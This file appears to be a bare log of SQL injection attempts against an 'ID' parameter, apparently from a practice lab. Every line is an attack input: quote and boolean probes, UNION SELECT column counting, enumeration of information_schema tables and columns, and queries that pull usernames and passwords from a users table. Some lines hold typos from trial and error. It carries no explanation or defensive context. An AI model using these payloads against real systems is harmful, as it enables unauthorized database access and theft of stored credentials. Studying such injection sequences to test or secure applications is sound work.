ID:1
ID:1'
ID:1" -- 
ID:1"  union select 1,1,1 -- 
ID:1"  union select 1,1,1  limit 1,1-- 
ID:1"
ID:1)
ID:1)
ID:1'
ID:1" and 1=1
ID:1" and 1=2
ID:1")  and 1=2 --
ID:1"
ID:1
ID:2
ID:3
ID:3'
ID:3"
ID:3"'
ID:3"
ID:3"
ID:3""
ID:"3""
ID:"3"
ID:"3
ID:1"
ID:1"
ID:1"'
ID:1",1'
ID:1",1
ID:1' or 1=1 -- 
ID:1' or 1=2 -- 
ID:1" or 1=2 -- 
ID:1"  and 1=2 -- 
ID:1"
ID:1'
ID:1''
ID:1'' and 1=2 
ID:1''
ID:1'
ID:1'"
ID:1'
ID:1"
ID:1'"
ID:1"'
ID:1'
ID:1''
ID:1'' union select 1,1 -- 
ID:1'' union select 1,1,1 limit 1,1 -- 
ID:1'') union select 1,1,1 limit 1,1 -- 
ID:1"
ID:1
ID:2
ID:2' '1'='1' -- 
ID:1"
ID:1' and '1'='1
ID:1' and '1'='2
ID:1' and '1'='3
ID:1' and '1'='1
ID:1'  union select 1,1,1 and '1'='1
ID:1
ID:1' and '1'='1
ID:1' union select 1,1,1 and '1'='1
ID:1
ID:1'
ID:1)
ID:1) -- 
ID:1)  union select 1,1,1 limit 1,1-- 
ID:1')  union select 1,1,1 limit 1,1-- 
ID:1')  union select 1,database(),user() limit 1,1-- 
ID:1')  union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database() limit 1,1-- 
ID:1')  union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_schema="uagents" limit 1,1-- 
ID:1')  union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_schema="email" limit 1,1-- 
ID:1')  union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_schema="users" limit 1,1-- 
ID:1')  union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_name="users" limit 1,1-- 
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1 
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1  --
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1  --
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1 -- 
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1  --
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1 -- 
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1 --
ID:1')  union select 1,group_concat(passoword),1 from users limit 1,1 -- 
ID:1')  union select 1,group_concat(username),1 from users limit 1,1 -- 
ID:1')  union select 1,group_concat(password),1 from users limit 1,1 -- 
ID:1"
ID:1
ID:1"
ID:1")
ID:1
ID:1"
ID:1")
ID:1"'
ID:1") union select 1,1,1 limit 1,1 -- 
ID:1")  union select 1,1,1 limit 1,1 -- 
ID:1')
ID:1")
ID:1") union select 1,1,1 limit 1,1 -- 
ID:1') union select 1,1,1 limit 1,1 -- 
ID:1') union select database(),user(),version() limit 1,1 -- 
ID:1') union select database(),user(),user() limit 1,1 -- 
ID:1') union select database(),database(),user() limit 1,1 -- 
ID:1')  union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database() limit 1,1-- 
ID:1')  union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database() limit 1,1-- 
ID:1')  union select union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_name="emails" limit 1,1 -- 
ID:1')  union select 1,group_concat(column_name),1 from information_schema.columns where table_schema=database() and table_name="users" limit 1,1-- 
